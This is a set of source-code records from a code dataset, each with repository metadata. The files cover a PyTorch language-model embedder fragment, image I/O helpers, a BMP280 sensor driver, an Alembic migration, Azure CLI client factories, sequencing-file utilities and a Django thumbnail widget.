s1 = s2 = zeros
else:
s1 = torch.cat([zeros, states[-1][:, :-1, :]], dim=1)
s2 = torch.cat([states[-1][:, 1:, :], zeros], dim=1)
if has_final_predictive:
states.insert(-1, s1)
states.insert(-1, s2)
else:
states.extend([s1, s2])
if self.combine_tower_states:
new_states = [torch.cat([states[0], states[0]], dim=-1)]
start = 1 end = len(states)
if has_final_predictive:
end -= 1
for i in range(start, end, 2):
new_states.append(torch.cat([states[i], states[i + 1]], dim=-1))
if self.add_final_predictive and has_final_predictive:
new_states.append(torch.cat([states[-1], states[-1]], dim=-1))
states = new_states
elif not self.add_final_predictive and has_final_predictive:
states = states[:-1]
return states
def _with_sentence_boundaries(
self,
input: torch.Tensor):
if not self.add_bos and not self.add_eos:
return input, None
zero_block = input.new(0, 0)
block_size = (input.size(0), 1, input.size(2)) if self.char_inputs else (input.size(0), 1)
bos_block = torch.full(block_size, self.eos_idx).type_as(input) if self.add_bos else zero_block
pad_block = torch.full(block_size, self.padding_idx).type_as(input) if self.add_eos else zero_block
input = torch.cat([bos_block, input, pad_block], dim=1)
first_pads = None if self.add_eos:
index_block = input[:, :, 0] if self.char_inputs else input
padding_mask = index_block.eq(self.padding_idx)
num_pads = padding_mask.long().sum(dim=1, keepdim=True)
max_len = input.size(1)
if self.onnx_trace:
first_pads = torch._dim_arange(input, 1).type_as(input).view(1, -1).\
repeat(input.size(0), 1).eq(max_len - num_pads)
eos_indices = first_pads
if self.char_inputs:
eos_indices = eos_indices.unsqueeze(2).repeat(1, 1, input.size(-1))
input = torch.where(eos_indices, torch.Tensor([self.eos_idx]).type_as(input), input)
else:
first_pads = buffered_arange(max_len).type_as(input).view(1, -1).\
expand(input.size(0), -1).eq(max_len - num_pads)
eos_indices = first_pads
if self.char_inputs:
eos_indices = eos_indices.unsqueeze(2).expand_as(input)
input[eos_indices] = self.eos_idx
return input, first_pads
def _without_sentence_boundaries(
self,
input: torch.Tensor,
):
if self.remove_bos:
input = input[:, 1:]
if self.remove_eos:
input = input[:, :-1]
return input
def forward(
self,
input: torch.Tensor,
):
input, eos_idx_mask = self._with_sentence_boundaries(input)
states = self._lm_states(input, eos_idx_mask)
if self.use_boundary_tokens:
return states[0]
if self.layer_norm is not None:
states = [self.layer_norm(s) for s in states]
if self.softmax is not None:
w = self.softmax(self.weights)
else:
w = self.weights
w = self.weights_dropout(w)
x = states[0].new_zeros(input.size()[:2] + (self.dim,))
for i in range(len(states)):
x += states[i] * w[i]
x = self._without_sentence_boundaries(x)
if self.projection is not None:
x = self.projection(x)
x = self.gamma * x
x = self.final_dropout(x)
return x
| true
| true
|
1c49078093350cc356b92ffcba2ca52a4bbe112b
| 598
|
py
|
Python
|
application/functions/utils.py
|
HM-SYS/Hackathon2018
|
9cac5db855f8ca7c4a65061eba4a2e9ab60721b9
|
[
"Apache-2.0"
] | 3
|
2018-09-18T00:27:18.000Z
|
2018-10-26T12:15:42.000Z
|
application/functions/utils.py
|
HM-SYS/Hackathon2018
|
9cac5db855f8ca7c4a65061eba4a2e9ab60721b9
|
[
"Apache-2.0"
] | 12
|
2018-09-05T06:08:43.000Z
|
2021-03-31T06:54:07.000Z
|
application/functions/utils.py
|
HM-SYS/Hackathon2018
|
9cac5db855f8ca7c4a65061eba4a2e9ab60721b9
|
[
"Apache-2.0"
] | 5
|
2018-09-01T09:41:40.000Z
|
2018-10-07T11:45:36.000Z
|
import os
import cv2
def load_image(file_path):
module_dir, _ = os.path.split(os.path.realpath(__file__))
absolute_path = os.path.join(module_dir, file_path)
image = cv2.imread(absolute_path)
# (h, w, c), uint8
# Change BGR to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
return image
def save_image(image, file_path):
module_dir, _ = os.path.split(os.path.realpath(__file__))
absolute_path = os.path.join(module_dir + "/../..", file_path)
# Change RGB to BGR
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
cv2.imwrite(absolute_path, image)
| 29.9
| 66
| 0.692308
|
import os
import cv2
def load_image(file_path):
module_dir, _ = os.path.split(os.path.realpath(__file__))
absolute_path = os.path.join(module_dir, file_path)
image = cv2.imread(absolute_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
return image
def save_image(image, file_path):
module_dir, _ = os.path.split(os.path.realpath(__file__))
absolute_path = os.path.join(module_dir + "/../..", file_path)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
cv2.imwrite(absolute_path, image)
| true
| true
|
1c490794f5f23d7f2b260743a6cdd0d3790f83c1
| 2,967
|
py
|
Python
|
lib/bmp280.py
|
natnqweb/Circuitpython-bmp280
|
9a79e1f6b5f0d53628d0e3a9f4fa0fdf65c82179
|
[
"Apache-2.0"
] | null | null | null |
lib/bmp280.py
|
natnqweb/Circuitpython-bmp280
|
9a79e1f6b5f0d53628d0e3a9f4fa0fdf65c82179
|
[
"Apache-2.0"
] | null | null | null |
lib/bmp280.py
|
natnqweb/Circuitpython-bmp280
|
9a79e1f6b5f0d53628d0e3a9f4fa0fdf65c82179
|
[
"Apache-2.0"
] | null | null | null |
import time
import board
from Simpletimer import simpletimer
import busio
import adafruit_bmp280
from digitalio import DigitalInOut, Direction, Pull
class BMP280:
def __init__(self,device_address=0x76,scl=board.GP5,sda=board.GP4,led_pin=board.GP25,sea_level_pressure=1017,temp_offset=-2.7):
self.device_address=device_address
self.temp_offset=temp_offset
self.ledpin=led_pin
self.led = DigitalInOut(self.ledpin)
self.led.direction = Direction.OUTPUT
self.timer1 = simpletimer()
self.timer2 = simpletimer()
self.SCL = scl
self.SDA = sda
self.i2c = busio.I2C(scl=self.SCL, sda=self.SDA)
self.bmp280 = adafruit_bmp280.Adafruit_BMP280_I2C(
self.i2c, address=device_address)
# change this to match the location's pressure (hPa) at sea level
self.bmp280.sea_level_pressure = sea_level_pressure
def print_current_settings(self):
self.current_settings=[self.bmp280.sea_level_pressure, self.SCL,self.SDA,self.temp_offset,self.device_address]
print(f"location sea level pressure:{self.bmp280.sea_level_pressure}\nselected SCL pin:{self.SCL}\nselected SDA pin:{self.SDA}\ntemperature offset:{self.temp_offset}\ndevice adress:{hex(self.device_address)}")
def blink(self, delay_=500):
if self.timer2.timer(delay_):
self.led.value = not self.led.value
#print(f"led state is:{led.value}")
def start_print_loop(self,print_refresh=2000,blink_refresh=300):
while True:
if self.timer1.timer(print_refresh):
self.temperature = self.bmp280.temperature+self.temp_offset
print("\nTemperature: %0.1f C" % self.temperature)
print("Pressure: %0.1f hPa" % self.bmp280.pressure)
print("Altitude = %0.2f meters" % self.bmp280.altitude)
self.blink(blink_refresh)
def read_and_print_sensor(self):
self.temperature = self.bmp280.temperature+self.temp_offset
print("\nTemperature: %0.1f C" % self.temperature)
print("Pressure: %0.1f hPa" % self.bmp280.pressure)
print("Altitude = %0.2f meters" % self.bmp280.altitude)
self.return_value=[self.temperature,self.bmp280.pressure,self.bmp280.altitude]
return self.return_value
def read_all(self):
self.temperature = self.bmp280.temperature+self.temp_offset
self.return_value=[self.temperature,self.bmp280.pressure,self.bmp280.altitude]
return self.return_value
def get_temperature(self):
self.temperature = self.bmp280.temperature+self.temp_offset
return self.temperature
def get_pressure(self):
self.pressure=self.bmp280.pressure
return self.pressure
def get_altitude(self):
self.altitude=self.bmp280.altitude
return self.altitude
| 43
| 218
| 0.667004
|
import time
import board
from Simpletimer import simpletimer
import busio
import adafruit_bmp280
from digitalio import DigitalInOut, Direction, Pull
class BMP280:
def __init__(self,device_address=0x76,scl=board.GP5,sda=board.GP4,led_pin=board.GP25,sea_level_pressure=1017,temp_offset=-2.7):
self.device_address=device_address
self.temp_offset=temp_offset
self.ledpin=led_pin
self.led = DigitalInOut(self.ledpin)
self.led.direction = Direction.OUTPUT
self.timer1 = simpletimer()
self.timer2 = simpletimer()
self.SCL = scl
self.SDA = sda
self.i2c = busio.I2C(scl=self.SCL, sda=self.SDA)
self.bmp280 = adafruit_bmp280.Adafruit_BMP280_I2C(
self.i2c, address=device_address)
self.bmp280.sea_level_pressure = sea_level_pressure
def print_current_settings(self):
self.current_settings=[self.bmp280.sea_level_pressure, self.SCL,self.SDA,self.temp_offset,self.device_address]
print(f"location sea level pressure:{self.bmp280.sea_level_pressure}\nselected SCL pin:{self.SCL}\nselected SDA pin:{self.SDA}\ntemperature offset:{self.temp_offset}\ndevice adress:{hex(self.device_address)}")
def blink(self, delay_=500):
if self.timer2.timer(delay_):
self.led.value = not self.led.value
#print(f"led state is:{led.value}")
def start_print_loop(self,print_refresh=2000,blink_refresh=300):
while True:
if self.timer1.timer(print_refresh):
self.temperature = self.bmp280.temperature+self.temp_offset
print("\nTemperature: %0.1f C" % self.temperature)
print("Pressure: %0.1f hPa" % self.bmp280.pressure)
print("Altitude = %0.2f meters" % self.bmp280.altitude)
self.blink(blink_refresh)
def read_and_print_sensor(self):
self.temperature = self.bmp280.temperature+self.temp_offset
print("\nTemperature: %0.1f C" % self.temperature)
print("Pressure: %0.1f hPa" % self.bmp280.pressure)
print("Altitude = %0.2f meters" % self.bmp280.altitude)
self.return_value=[self.temperature,self.bmp280.pressure,self.bmp280.altitude]
return self.return_value
def read_all(self):
self.temperature = self.bmp280.temperature+self.temp_offset
self.return_value=[self.temperature,self.bmp280.pressure,self.bmp280.altitude]
return self.return_value
def get_temperature(self):
self.temperature = self.bmp280.temperature+self.temp_offset
return self.temperature
def get_pressure(self):
self.pressure=self.bmp280.pressure
return self.pressure
def get_altitude(self):
self.altitude=self.bmp280.altitude
return self.altitude
| true
| true
|
1c4907d49248464dc73ddb83b04157b6a1e21988
| 970
|
py
|
Python
|
migrations/versions/c0a92da5ac69_create_request_table.py
|
uc-cdis/requestor
|
2054de283b37bb97243f1fe7305d42d8fdfa1888
|
[
"Apache-2.0"
] | 2
|
2021-03-04T23:08:50.000Z
|
2021-07-12T13:48:06.000Z
|
migrations/versions/c0a92da5ac69_create_request_table.py
|
uc-cdis/requestor
|
2054de283b37bb97243f1fe7305d42d8fdfa1888
|
[
"Apache-2.0"
] | 25
|
2020-08-24T20:18:23.000Z
|
2022-02-17T23:34:52.000Z
|
migrations/versions/c0a92da5ac69_create_request_table.py
|
uc-cdis/requestor
|
2054de283b37bb97243f1fe7305d42d8fdfa1888
|
[
"Apache-2.0"
] | null | null | null |
"""create request table
Revision ID: c0a92da5ac69
Revises:
Create Date: 2020-08-18 13:40:12.031174
"""
import sqlalchemy as sa
from alembic import op
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = "c0a92da5ac69"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"requests",
sa.Column("request_id", postgresql.UUID(), nullable=False),
sa.Column("username", sa.String(), nullable=False),
sa.Column("resource_path", sa.String(), nullable=False),
sa.Column("resource_id", sa.String()),
sa.Column("resource_display_name", sa.String()),
sa.Column("status", sa.String(), nullable=False),
sa.Column("created_time", sa.DateTime(), nullable=False),
sa.Column("updated_time", sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint("request_id"),
)
def downgrade():
op.drop_table("requests")
| 26.944444
| 67
| 0.679381
|
import sqlalchemy as sa
from alembic import op
from sqlalchemy.dialects import postgresql
revision = "c0a92da5ac69"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"requests",
sa.Column("request_id", postgresql.UUID(), nullable=False),
sa.Column("username", sa.String(), nullable=False),
sa.Column("resource_path", sa.String(), nullable=False),
sa.Column("resource_id", sa.String()),
sa.Column("resource_display_name", sa.String()),
sa.Column("status", sa.String(), nullable=False),
sa.Column("created_time", sa.DateTime(), nullable=False),
sa.Column("updated_time", sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint("request_id"),
)
def downgrade():
op.drop_table("requests")
| true
| true
|
1c4909f1abd01799b2eb57c4291d44dbf66be59e
| 4,478
|
py
|
Python
|
src/azure-cli/azure/cli/command_modules/acs/_client_factory.py
|
heaths/azure-cli
|
baae1d17ffc4f3abfeccea17116bfd61de5770f1
|
[
"MIT"
] | 1
|
2019-11-15T17:28:05.000Z
|
2019-11-15T17:28:05.000Z
|
src/azure-cli/azure/cli/command_modules/acs/_client_factory.py
|
heaths/azure-cli
|
baae1d17ffc4f3abfeccea17116bfd61de5770f1
|
[
"MIT"
] | 1
|
2021-06-02T00:40:34.000Z
|
2021-06-02T00:40:34.000Z
|
src/azure-cli/azure/cli/command_modules/acs/_client_factory.py
|
heaths/azure-cli
|
baae1d17ffc4f3abfeccea17116bfd61de5770f1
|
[
"MIT"
] | 1
|
2019-11-25T19:33:05.000Z
|
2019-11-25T19:33:05.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands.parameters import get_resources_in_subscription
from azure.cli.core.profiles import ResourceType
from knack.util import CLIError
def cf_compute_service(cli_ctx, *_):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_COMPUTE)
def cf_container_services(cli_ctx, *_):
return get_container_service_client(cli_ctx).container_services
def cf_managed_clusters(cli_ctx, *_):
return get_container_service_client(cli_ctx).managed_clusters
def cf_agent_pools(cli_ctx, *_):
return get_container_service_client(cli_ctx).agent_pools
def cf_openshift_managed_clusters(cli_ctx, *_):
return get_osa_container_service_client(cli_ctx).open_shift_managed_clusters
def cf_resource_groups(cli_ctx, subscription_id=None):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).resource_groups
def cf_resources(cli_ctx, subscription_id=None):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).resources
def cf_container_registry_service(cli_ctx, subscription_id=None):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_CONTAINERREGISTRY,
subscription_id=subscription_id)
def get_auth_management_client(cli_ctx, scope=None, **_):
import re
subscription_id = None
if scope:
matched = re.match('/subscriptions/(?P<subscription>[^/]*)/', scope)
if matched:
subscription_id = matched.groupdict()['subscription']
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_AUTHORIZATION, subscription_id=subscription_id)
def get_container_service_client(cli_ctx, **_):
from azure.mgmt.containerservice import ContainerServiceClient
return get_mgmt_service_client(cli_ctx, ContainerServiceClient)
def get_osa_container_service_client(cli_ctx, **_):
from azure.mgmt.containerservice import ContainerServiceClient
return get_mgmt_service_client(cli_ctx, ContainerServiceClient, api_version='2019-04-30')
def get_graph_rbac_management_client(cli_ctx, **_):
from azure.cli.core.commands.client_factory import configure_common_settings
from azure.cli.core._profile import Profile
from azure.graphrbac import GraphRbacManagementClient
profile = Profile(cli_ctx=cli_ctx)
cred, _, tenant_id = profile.get_login_credentials(
resource=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
client = GraphRbacManagementClient(
cred, tenant_id,
base_url=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
configure_common_settings(cli_ctx, client)
return client
def get_resource_by_name(cli_ctx, resource_name, resource_type):
"""Returns the ARM resource in the current subscription with resource_name.
:param str resource_name: The name of resource
:param str resource_type: The type of resource
"""
result = get_resources_in_subscription(cli_ctx, resource_type)
elements = [item for item in result if item.name.lower() ==
resource_name.lower()]
if not elements:
from azure.cli.core._profile import Profile
profile = Profile(cli_ctx=cli_ctx)
message = "The resource with name '{}' and type '{}' could not be found".format(
resource_name, resource_type)
try:
subscription = profile.get_subscription(
cli_ctx.data['subscription_id'])
raise CLIError(
"{} in subscription '{} ({})'.".format(message, subscription['name'], subscription['id']))
except (KeyError, TypeError):
raise CLIError(
"{} in the current subscription.".format(message))
elif len(elements) == 1:
return elements[0]
else:
raise CLIError(
"More than one resources with type '{}' are found with name '{}'.".format(
resource_type, resource_name))
| 39.280702
| 109
| 0.702546
|
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands.parameters import get_resources_in_subscription
from azure.cli.core.profiles import ResourceType
from knack.util import CLIError
def cf_compute_service(cli_ctx, *_):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_COMPUTE)
def cf_container_services(cli_ctx, *_):
return get_container_service_client(cli_ctx).container_services
def cf_managed_clusters(cli_ctx, *_):
return get_container_service_client(cli_ctx).managed_clusters
def cf_agent_pools(cli_ctx, *_):
return get_container_service_client(cli_ctx).agent_pools
def cf_openshift_managed_clusters(cli_ctx, *_):
return get_osa_container_service_client(cli_ctx).open_shift_managed_clusters
def cf_resource_groups(cli_ctx, subscription_id=None):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).resource_groups
def cf_resources(cli_ctx, subscription_id=None):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).resources
def cf_container_registry_service(cli_ctx, subscription_id=None):
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_CONTAINERREGISTRY,
subscription_id=subscription_id)
def get_auth_management_client(cli_ctx, scope=None, **_):
import re
subscription_id = None
if scope:
matched = re.match('/subscriptions/(?P<subscription>[^/]*)/', scope)
if matched:
subscription_id = matched.groupdict()['subscription']
return get_mgmt_service_client(cli_ctx, ResourceType.MGMT_AUTHORIZATION, subscription_id=subscription_id)
def get_container_service_client(cli_ctx, **_):
from azure.mgmt.containerservice import ContainerServiceClient
return get_mgmt_service_client(cli_ctx, ContainerServiceClient)
def get_osa_container_service_client(cli_ctx, **_):
from azure.mgmt.containerservice import ContainerServiceClient
return get_mgmt_service_client(cli_ctx, ContainerServiceClient, api_version='2019-04-30')
def get_graph_rbac_management_client(cli_ctx, **_):
from azure.cli.core.commands.client_factory import configure_common_settings
from azure.cli.core._profile import Profile
from azure.graphrbac import GraphRbacManagementClient
profile = Profile(cli_ctx=cli_ctx)
cred, _, tenant_id = profile.get_login_credentials(
resource=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
client = GraphRbacManagementClient(
cred, tenant_id,
base_url=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
configure_common_settings(cli_ctx, client)
return client
def get_resource_by_name(cli_ctx, resource_name, resource_type):
result = get_resources_in_subscription(cli_ctx, resource_type)
elements = [item for item in result if item.name.lower() ==
resource_name.lower()]
if not elements:
from azure.cli.core._profile import Profile
profile = Profile(cli_ctx=cli_ctx)
message = "The resource with name '{}' and type '{}' could not be found".format(
resource_name, resource_type)
try:
subscription = profile.get_subscription(
cli_ctx.data['subscription_id'])
raise CLIError(
"{} in subscription '{} ({})'.".format(message, subscription['name'], subscription['id']))
except (KeyError, TypeError):
raise CLIError(
"{} in the current subscription.".format(message))
elif len(elements) == 1:
return elements[0]
else:
raise CLIError(
"More than one resources with type '{}' are found with name '{}'.".format(
resource_type, resource_name))
| true
| true
|
1c490bdffe401b976343f5470b288a8b93ec6bba
| 714
|
py
|
Python
|
clock.py
|
Jownao/Clock_RealTIme
|
b3ca1ca88b5051f28d055d2bcd17c2107de3e007
|
[
"MIT"
] | null | null | null |
clock.py
|
Jownao/Clock_RealTIme
|
b3ca1ca88b5051f28d055d2bcd17c2107de3e007
|
[
"MIT"
] | null | null | null |
clock.py
|
Jownao/Clock_RealTIme
|
b3ca1ca88b5051f28d055d2bcd17c2107de3e007
|
[
"MIT"
] | null | null | null |
from tkinter import *
from tkinter import ttk
from tkinter import font
import time
import datetime
def quit(*args):
root.destroy()
def clock_time():
time = datetime.datetime.now()
time = (time.strftime("%H:%M:%S"))
txt.set(time)
root.after(1000,clock_time)
root = Tk()
root.attributes("-fullscreen",False)
root.configure(background='black')
root.bind('x',quit)
root.after(1000,clock_time)
fnt = font.Font(family = 'Helvetica',size = 30,weight = 'bold')
txt = StringVar()
lbl = ttk.Label(root, textvariable=txt, font = fnt, foreground = 'white', background = 'black')
lbl.place(relx = 0.5,rely = 0.5,anchor=CENTER)
root.title('Relógio Futurista')
root.geometry("500x300")
root.mainloop()
| 22.3125
| 95
| 0.70028
|
from tkinter import *
from tkinter import ttk
from tkinter import font
import time
import datetime
def quit(*args):
root.destroy()
def clock_time():
time = datetime.datetime.now()
time = (time.strftime("%H:%M:%S"))
txt.set(time)
root.after(1000,clock_time)
root = Tk()
root.attributes("-fullscreen",False)
root.configure(background='black')
root.bind('x',quit)
root.after(1000,clock_time)
fnt = font.Font(family = 'Helvetica',size = 30,weight = 'bold')
txt = StringVar()
lbl = ttk.Label(root, textvariable=txt, font = fnt, foreground = 'white', background = 'black')
lbl.place(relx = 0.5,rely = 0.5,anchor=CENTER)
root.title('Relógio Futurista')
root.geometry("500x300")
root.mainloop()
| true
| true
|
1c490c19f2b012bad0afacdd8c59b7c1426d59e5
| 1,934
|
py
|
Python
|
gimmebio/ponce_de_leon/gimmebio/ponce_de_leon/io_utils.py
|
Chandrima-04/gimmebio
|
cb3e66380006d5c5c00ff70bfb87317dd252c312
|
[
"MIT"
] | 3
|
2020-01-21T23:49:55.000Z
|
2020-07-29T17:02:30.000Z
|
gimmebio/ponce_de_leon/gimmebio/ponce_de_leon/io_utils.py
|
Chandrima-04/gimmebio
|
cb3e66380006d5c5c00ff70bfb87317dd252c312
|
[
"MIT"
] | null | null | null |
gimmebio/ponce_de_leon/gimmebio/ponce_de_leon/io_utils.py
|
Chandrima-04/gimmebio
|
cb3e66380006d5c5c00ff70bfb87317dd252c312
|
[
"MIT"
] | 4
|
2020-01-21T16:48:17.000Z
|
2020-03-13T15:34:52.000Z
|
from pysam import AlignmentFile as SamFile
import gzip
def remove_ext(filename, extensions):
ext = filename.split('.')[-1]
if ext in extensions:
without_ext = '.'.join(filename.split('.')[:-1])
return remove_ext(without_ext, extensions)
else:
return filename
def iter_chunks(handle, n, preprocess=lambda x: x):
chunk = [None] * n
for j, line in enumerate(handle):
i = j % n
if (i == 0) and (j != 0):
yield chunk
chunk = [None] * n
chunk[i] = preprocess(line)
yield chunk
def open_maybe_gzip(filename):
if type(filename) == str:
handle = open(filename)
else:
handle = filename
filename = handle.name
if '.gz' in filename:
handle = gzip.open(handle.buffer, mode='rt')
return handle
def open_samfile(handle):
ext = 'r'
if '.bam' in handle.name:
ext = 'rb'
samfile = SamFile(handle, ext)
return samfile
def parse_bed_file(bed_file):
out = {}
for line in bed_file:
tkns = line.split()
region = (int(tkns[1]), int(tkns[2]))
try:
out[tkns[0]].append(region)
except KeyError:
out[tkns[0]] = [region]
except IndexError:
continue
return out
def get_bc_token(id_line):
tkns = id_line.split()
for tkn in tkns:
if 'BX:' in tkn:
return tkn
def get_bc_sam(read):
return 'BX:Z:' + read.get_tag('BX') + ',BC:Z:' + read.get_tag('BC')
def get_read_id(id_line):
tkns = id_line.split()
return tkns[0][1:]
def parse_bc_map(filename):
bc_map = {}
handle = open_maybe_gzip(filename)
for chunk in iter_chunks(handle, 4):
rid = get_read_id(chunk[0])
bc = get_bc_token(chunk[0])
bc_map[rid] = bc
handle.close()
return bc_map
def parse_bc_list(handle):
return {bc.strip() for bc in handle}
| 22.229885
| 71
| 0.576008
|
from pysam import AlignmentFile as SamFile
import gzip
def remove_ext(filename, extensions):
ext = filename.split('.')[-1]
if ext in extensions:
without_ext = '.'.join(filename.split('.')[:-1])
return remove_ext(without_ext, extensions)
else:
return filename
def iter_chunks(handle, n, preprocess=lambda x: x):
chunk = [None] * n
for j, line in enumerate(handle):
i = j % n
if (i == 0) and (j != 0):
yield chunk
chunk = [None] * n
chunk[i] = preprocess(line)
yield chunk
def open_maybe_gzip(filename):
if type(filename) == str:
handle = open(filename)
else:
handle = filename
filename = handle.name
if '.gz' in filename:
handle = gzip.open(handle.buffer, mode='rt')
return handle
def open_samfile(handle):
ext = 'r'
if '.bam' in handle.name:
ext = 'rb'
samfile = SamFile(handle, ext)
return samfile
def parse_bed_file(bed_file):
out = {}
for line in bed_file:
tkns = line.split()
region = (int(tkns[1]), int(tkns[2]))
try:
out[tkns[0]].append(region)
except KeyError:
out[tkns[0]] = [region]
except IndexError:
continue
return out
def get_bc_token(id_line):
tkns = id_line.split()
for tkn in tkns:
if 'BX:' in tkn:
return tkn
def get_bc_sam(read):
return 'BX:Z:' + read.get_tag('BX') + ',BC:Z:' + read.get_tag('BC')
def get_read_id(id_line):
tkns = id_line.split()
return tkns[0][1:]
def parse_bc_map(filename):
bc_map = {}
handle = open_maybe_gzip(filename)
for chunk in iter_chunks(handle, 4):
rid = get_read_id(chunk[0])
bc = get_bc_token(chunk[0])
bc_map[rid] = bc
handle.close()
return bc_map
def parse_bc_list(handle):
return {bc.strip() for bc in handle}
| true
| true
|
1c490cee1fa1b4454900d769b260481d43b71339
| 144
|
py
|
Python
|
Apps/phnetskope/__init__.py
|
mattsayar-splunk/phantom-apps
|
b719b78ded609ae3cbd62d7d2cc317db1a613d3b
|
[
"Apache-2.0"
] | 74
|
2019-10-22T02:00:53.000Z
|
2022-03-15T12:56:13.000Z
|
Apps/phnetskope/__init__.py
|
mattsayar-splunk/phantom-apps
|
b719b78ded609ae3cbd62d7d2cc317db1a613d3b
|
[
"Apache-2.0"
] | 375
|
2019-10-22T20:53:50.000Z
|
2021-11-09T21:28:43.000Z
|
Apps/phnetskope/__init__.py
|
mattsayar-splunk/phantom-apps
|
b719b78ded609ae3cbd62d7d2cc317db1a613d3b
|
[
"Apache-2.0"
] | 175
|
2019-10-23T15:30:42.000Z
|
2021-11-05T21:33:31.000Z
|
# File: __init__.py
# Copyright (c) 2018-2020 Splunk Inc.
#
# Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
pass
| 20.571429
| 77
| 0.715278
|
pass
| true
| true
|
1c490edf4882c5f80d01f803ed6fbaf91e301788
| 1,662
|
py
|
Python
|
vendor-local/lib/python/easy_thumbnails/widgets.py
|
Koenkk/popcorn_maker
|
0978b9f98dacd4e8eb753404b24eb584f410aa11
|
[
"BSD-3-Clause"
] | 15
|
2015-03-23T02:55:20.000Z
|
2021-01-12T12:42:30.000Z
|
vendor-local/lib/python/easy_thumbnails/widgets.py
|
Koenkk/popcorn_maker
|
0978b9f98dacd4e8eb753404b24eb584f410aa11
|
[
"BSD-3-Clause"
] | null | null | null |
vendor-local/lib/python/easy_thumbnails/widgets.py
|
Koenkk/popcorn_maker
|
0978b9f98dacd4e8eb753404b24eb584f410aa11
|
[
"BSD-3-Clause"
] | 16
|
2015-02-18T21:43:31.000Z
|
2021-11-09T22:50:03.000Z
|
from django.forms.widgets import ClearableFileInput
from django.utils.safestring import mark_safe
from easy_thumbnails.files import get_thumbnailer
class ImageClearableFileInput(ClearableFileInput):
template_with_initial = u'%(clear_template)s<br />'\
u'%(input_text)s: %(input)s'
template_with_thumbnail = u'%(template)s<br />'\
u'<a href="%(source_url)s" target="_blank">%(thumb)s</a>'
def __init__(self, thumbnail_options=None, attrs=None):
thumbnail_options = thumbnail_options or {}
thumbnail_options = thumbnail_options.copy()
if not 'size' in thumbnail_options:
thumbnail_options['size'] = (80, 80)
self.thumbnail_options = thumbnail_options.copy()
super(ImageClearableFileInput, self).__init__(attrs)
def thumbnail_id(self, name):
return '%s_thumb_id' % name
def get_thumbnail(self, value):
thumbnailer = get_thumbnailer(value, value.name)
thumbnailer.source_storage = value.storage
if hasattr(value, 'thumbnail_storage'):
thumbnailer.thumbnail_storage = value.thumbnail_storage
return thumbnailer.get_thumbnail(self.thumbnail_options)
def render(self, name, value, attrs=None):
output = super(ImageClearableFileInput, self).render(name, value, attrs)
if not value:
return output
thumb = self.get_thumbnail(value)
substitution = {
'template': output,
'thumb': thumb.tag(id=self.thumbnail_id(name)),
'source_url': value.storage.url(value.name),
}
return mark_safe(self.template_with_thumbnail % substitution)
| 40.536585
| 80
| 0.6787
|
from django.forms.widgets import ClearableFileInput
from django.utils.safestring import mark_safe
from easy_thumbnails.files import get_thumbnailer
class ImageClearableFileInput(ClearableFileInput):
template_with_initial = u'%(clear_template)s<br />'\
u'%(input_text)s: %(input)s'
template_with_thumbnail = u'%(template)s<br />'\
u'<a href="%(source_url)s" target="_blank">%(thumb)s</a>'
def __init__(self, thumbnail_options=None, attrs=None):
thumbnail_options = thumbnail_options or {}
thumbnail_options = thumbnail_options.copy()
if not 'size' in thumbnail_options:
thumbnail_options['size'] = (80, 80)
self.thumbnail_options = thumbnail_options.copy()
super(ImageClearableFileInput, self).__init__(attrs)
def thumbnail_id(self, name):
return '%s_thumb_id' % name
def get_thumbnail(self, value):
thumbnailer = get_thumbnailer(value, value.name)
thumbnailer.source_storage = value.storage
if hasattr(value, 'thumbnail_storage'):
thumbnailer.thumbnail_storage = value.thumbnail_storage
return thumbnailer.get_thumbnail(self.thumbnail_options)
def render(self, name, value, attrs=None):
output = super(ImageClearableFileInput, self).render(name, value, attrs)
if not value:
return output
thumb = self.get_thumbnail(value)
substitution = {
'template': output,
'thumb': thumb.tag(id=self.thumbnail_id(name)),
'source_url': value.storage.url(value.name),
}
return mark_safe(self.template_with_thumbnail % substitution)
| true
| true
|
1c490f1a380aadc639c7edc04e2cbf4c82624fbb
| 1,706
|
py
|
Python
|
ignite/contrib/metrics/regression/median_absolute_error.py
|
MinjaMiladinovic/ignite
|
007d320150fa915d7ac8757ddb586aaa9c427682
|
[
"BSD-3-Clause"
] | null | null | null |
ignite/contrib/metrics/regression/median_absolute_error.py
|
MinjaMiladinovic/ignite
|
007d320150fa915d7ac8757ddb586aaa9c427682
|
[
"BSD-3-Clause"
] | null | null | null |
ignite/contrib/metrics/regression/median_absolute_error.py
|
MinjaMiladinovic/ignite
|
007d320150fa915d7ac8757ddb586aaa9c427682
|
[
"BSD-3-Clause"
] | null | null | null |
from typing import Callable
import torch
from ignite.contrib.metrics.regression._base import _BaseRegressionEpoch
